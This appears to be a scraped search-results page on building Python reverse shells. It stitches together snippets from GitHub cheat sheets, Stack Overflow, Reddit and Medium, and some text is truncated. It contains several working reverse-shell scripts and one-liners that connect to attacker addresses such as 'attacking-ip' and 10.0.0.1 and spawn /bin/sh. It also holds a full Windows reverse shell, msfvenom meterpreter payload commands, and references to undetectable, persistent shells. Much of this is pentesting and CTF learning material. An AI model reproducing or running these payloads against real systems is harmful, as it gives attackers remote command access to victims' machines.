subprocess module was introduced in Python 2.4.
You can use os.system instead of subprocess.call:
import socket, os
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("attacking-ip", 443))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
os.system("/bin/sh -i")
python -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacking-ip",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.system("/bin/sh -i")'
GitHub
github.com › swisskyrepo › PayloadsAllTheThings › blob › master › Methodology and Resources › Reverse Shell Cheatsheet.md
PayloadsAllTheThings/Methodology and Resources/Reverse Shell Cheatsheet.md at master · swisskyrepo/PayloadsAllTheThings
Automatic Reverse Shell Generator · Bash TCP · Bash UDP · C · Dart · Golang · Groovy Alternative 1 · Groovy · Java Alternative 1 · Java Alternative 2 · Java · Lua · Ncat · Netcat OpenBsd · Netcat BusyBox · Netcat Traditional · NodeJS · OGNL · OpenSSL · Perl · PHP · Powershell · Python ·
Author swisskyrepo
How can I use ctrl-c when in a reverse shell without breaking out of the shell?
You can create yourself a nicer shell: In reverse shell $ python -c 'import pty; pty.spawn("/bin/bash")' Ctrl-Z In OS $ stty raw -echo $ fg Ctrl-C etc. should work, have fun! :) More on reddit.com
14
64
August 11, 2022Reverse shell using python - Stack Overflow
Another question, i saw people ... as the reverse shell, and it really works. Is this way better or what ?! Thanks 2016-07-15T10:17:34.913Z+00:00 ... sandboxing means every process has a virtual memory made of the files it is allowed to access e.i. read, write, execute (and the sys-calls it can use but that's for a different day). Typically a python process (and ... More on stackoverflow.com
shellcode - Python windows reverse shell one liner - Stack Overflow
Can anyone help me on a Python reverse shell one-liner for Windows (has to be windows one-liner). I am trying to modify the one for Linux which I have used many times but this is my first time for More on stackoverflow.com
easy-shell: A pure Python script to easily get a reverse shell.
whats a good use case for this? a target where you cant run nc? More on reddit.com
18
239
December 12, 2020Videos
Python Reverse Shell Tutorial - 4 - Client to Server Connection
08:46
Python Reverse Shell Tutorial - 1 - Creating a Socket - YouTube
07:07
Python Reverse Shell Tutorial - 9 - Creating a Custom Interactive ...
01:43:33
Python TCP Reverse Shell Tutorial - EXE & Persistence & FUD & More!
11:56
Create a Reverse Shell Using a Fake MP4 File [Tutorial] - YouTube
04:42
Creazione di una REVERSE SHELL Python - Speed Coding - Programmazione ...
The Python Code
thepythoncode.com › article › create-reverse-shell-python
How to Create a Reverse Shell in Python - The Python Code
Building a reverse shell in Python using sockets that can execute remote shell commands and send the results back to the server.
ropnop blog
blog.ropnop.com › home › upgrading simple shells to fully interactive t t ys
Upgrading Simple Shells to Fully Interactive TTYs - ropnop blog
July 10, 2017 - Metasploit has several payloads under “cmd/unix” that can be used to generate one-liner bind or reverse shells: Any of these payloads can be used with msfvenom to spit out the raw command needed (specifying LHOST, LPORT or RPORT). For example, here’s a netcat command not requiring the -e flag: And here’s a Perl oneliner in case netcat isn’t installed: These can all be caught by using netcat and listening on the port specified (4444). One of my go-to commands for a long time after catching a dumb shell was to use Python to spawn a pty.
tpetersonkth
tpetersonkth.github.io › 2021 › 10 › 16 › Creating-a-Basic-Python-Reverse-Shell-Listener.html
Creating a Basic Python Reverse Shell Listener | tpetersonkth
October 16, 2021 - Introduction This week I wanted to create a listener in python which functioned like the command nc -lp [port], which is commonly used to catch reverse shells. At first, I thought it would be a piece of cake and would simply be something like reading the user input for a command, sending the ...
GitHub
gist.github.com › mike10004 › 2291abeb8825b3f73fee
Reverse Shell Using Python · GitHub
Via http://null-byte.wonderhowto.com/how-to/reverse-shell-using-python-0163875/ with some style changes (to use classes instead of globals).
GitHub
gist.github.com › lucasgates › 0c6330c582d0ccf52fad129d5e7e9de7
Python one-liner to create a reverse shell to listening netcat server. · GitHub
Python one-liner to create a reverse shell to listening netcat server. - python-reverse-shell.txt
Medium
medium.com › @rietesh › python-reverse-shell-hack-your-neighbours-552561336ca8
PYTHON REVERSE SHELL (HACK YOUR NEIGHBOURS!!!) | by Rietesh Amminabhavi | Medium
January 22, 2019 - A reverse shell is a type of shell in which the target machine communicates back to the attacking machine. The attacking machine has a listener port on which it receives the connection, which by using, code or command execution is achieved. ... I have created a simple server and client applications in python. With these applications you can execute commands on a target machine. The server side code is: import socket import threading import os#1 def send_commands(conn): while True: cmd = input() if cmd == 'quit': conn.close() server.close() sys.exit() if len(str.encode(cmd)) > 0: conn.send(str.
Howik
howik.com › home › cybersecurity & hacking › python reverse shell without imports
Python Reverse Shell Without Imports - Howik
June 29, 2025 - But what actually happens behind the curtain? Most people think it's all about fancy tools and complex code. In reality, a reverse shell can be surprisingly simple, especially if you're using Python. And here's the kicker: you can do it without importing any modules.
Reddit
reddit.com › r/howtohack › how can i use ctrl-c when in a reverse shell without breaking out of the shell?
r/HowToHack on Reddit: How can I use ctrl-c when in a reverse shell without breaking out of the shell?
August 11, 2022 -
Apologies if I'm phrasing this poorly.
I'm working on a Hack The Box VM (Vaccine, if you're curious). I was able to get a reverse shell on the machine, and I ran a process that was taking too long. I hit ctrl-c to stop it, but that kicked me out of the shell. I had to re-establish the connection and get back to what I was doing.
Is there a way to be able to use commands like that in the reverse shell without getting kicked out? Some way to tell the terminal window "Anything that I do, I want to do on the server and don't interpret it as a local command"?
Medium
fahmifj.medium.com › get-a-fully-interactive-reverse-shell-b7e8d6f5b1c1
How to Get a Fully Interactive Reverse Shell | by Fahmi J | Medium
October 9, 2022 - Visit this web for alternative if there’s no python installed in the machine. I also found another way using script just after I published this post. ... Once done, type $ fg (you won’t be able to see what you type, but don’t worry) to bring the shell back to foreground and hit enter two times or just use ... Now you should be able to use arrows key and tab completion in the shell.
Medium
medium.com › dont-code-me-on-that › bunch-of-shells-python-b3fb1400b823
Snippets: Python Reverse Shells
February 26, 2023 - Here are a bunch of reverse shell snippets inspired by PayloadAllTheThings. Change the host, run the shell on the target and use this to catch the shell on Kali: ... The snippets point to localhost so you can run the snippets on local to test. Enjoy your shells! ... python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",12345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Finxter
blog.finxter.com › home › learn python blog › python one line reverse shell
Python One Line Reverse Shell - Be on the Right Side of Change
July 30, 2020 - The only thing the attacker must do is to get the target to execute the code on their machine, open up a reverse shell and connect to the attacker’s machine. The attacker opens a port on their own machine and wait for the client to connect to this port. Sources: You can read more here and here. I found this code in a blog thread. You can run it from any computer with Python installed and visible from your current location: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Stack Overflow
stackoverflow.com › questions › 38385427 › reverse-shell-using-python
Reverse shell using python - Stack Overflow
Another question, i saw people did this using netcat as a listener and using dup2() as the reverse shell, and it really works. Is this way better or what ?! Thanks 2016-07-15T10:17:34.913Z+00:00 ... sandboxing means every process has a virtual memory made of the files it is allowed to access e.i. read, write, execute (and the sys-calls it can use but that's for a different day). Typically a python process (and all its child processes) might be executed with privileges that only allow it to access files in its directory or in a larger sandbox (like all of the user's files, or all of the files in system).
pentestmonkey
pentestmonkey.net › cheat-sheet › shells › reverse-shell-cheat-sheet
Reverse Shell Cheat Sheet | pentestmonkey
One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server.
Medium
medium.com › @dineshkumaar478 › a-step-by-step-guide-to-turning-a-basic-reverse-shell-into-a-fully-interactive-terminal-using-41c512e5e0cc
A Step-by-Step Guide to turning a basic reverse shell into a fully interactive terminal using Python | by Dineshkumaar R | Medium
December 8, 2023 - The pty module in Python provides a simple interface to the pseudo-terminal (pty) subsystem. It allows you to spawn a new process with its own pseudo-terminal and communicate with it as if it were a separate terminal. ... 1. The currently running foreground process is stopped. 2. The process ID (PID) of the stopped process is reported. 3. The process is moved to the background, and control is returned to the shell.
Medium
medium.com › geekculture › breaking-down-a-python-reverse-shell-one-liner-752041733e5f
Breaking Down A Python Reverse Shell One-Liner | by Alex Rodriguez | Geek Culture | Medium
August 25, 2023 - Hello, World! In this article, we will dissect the most popular Python reverse shell one-liner that is used in ethical hacking to obtain remote command execution on a target machine. We will go through the one-liner, line-by-line, to understand how we can use built-in Python modules and how we manipulate Linux file descriptors to achieve remote access to a machine.
GitHub
github.com › nicholasaleks › reverse-shells
GitHub - nicholasaleks/reverse-shells: A collection of reverse shell commands and payloads · GitHub
$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f elf > shell.elf $ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f exe > shell.exe $ msfvenom -p osx/x86/shell_reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f macho > shell.macho $ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f asp > shell.asp $ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f raw > shell.jsp $ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f war > shell.war $ msfvenom -p cmd/unix/reverse_python LHOST="10.0.0.
Starred by 51 users
Forked by 11 users
Top answer 1 of 4
8
(@rockstar: I think you and I are studying the same thing!)
Not a one liner, but learning from David Cullen's answer, I put together this reverse shell for Windows.
import os,socket,subprocess,threading;
def s2p(s, p):
while True:
data = s.recv(1024)
if len(data) > 0:
p.stdin.write(data)
p.stdin.flush()
def p2s(s, p):
while True:
s.send(p.stdout.read(1))
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.11.0.37",4444))
p=subprocess.Popen(["\\windows\\system32\\cmd.exe"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
s2p_thread = threading.Thread(target=s2p, args=[s, p])
s2p_thread.daemon = True
s2p_thread.start()
p2s_thread = threading.Thread(target=p2s, args=[s, p])
p2s_thread.daemon = True
p2s_thread.start()
try:
p.wait()
except KeyboardInterrupt:
s.close()
If anybody can condense this down to a single line, please feel free to edit my post or adapt this into your own answer...
2 of 4
3
From the documentation for socket.fileno():
Under Windows the small integer returned by this method cannot be used where a file descriptor can be used (such as os.fdopen()). Unix does not have this limitation.
I do not think you can use os.dup2() on the return value of socket.fileno() on Windows unless you are using Cygwin.
I do not think you can do this as a one-liner on Windows because you need a while loop with multiple statements.
Reddit
reddit.com › r/howtohack › easy-shell: a pure python script to easily get a reverse shell.
r/HowToHack on Reddit: easy-shell: A pure Python script to easily get a reverse shell.
December 12, 2020 -
After sending a request, easy-shell generates a payload with different commands available to get a reverse shell (python, perl, awk, and more).
It was written using the default Python modules, so you do not need to install external dependencies.
GitHub repository: https://github.com/crhenr/easy-shell
Top answer 1 of 4
15
whats a good use case for this? a target where you cant run nc?
2 of 4
7
Great job! As far as I could understand, this script answers to a reverse connection from the target with several shell commands that check the existence of supported resources in the system (Python, Perl, AWK, PHP, etc). Upon identification of a valid resource it establishes an optionally encrypted tunnel and sends the corresponding payload for local execution. Am I right?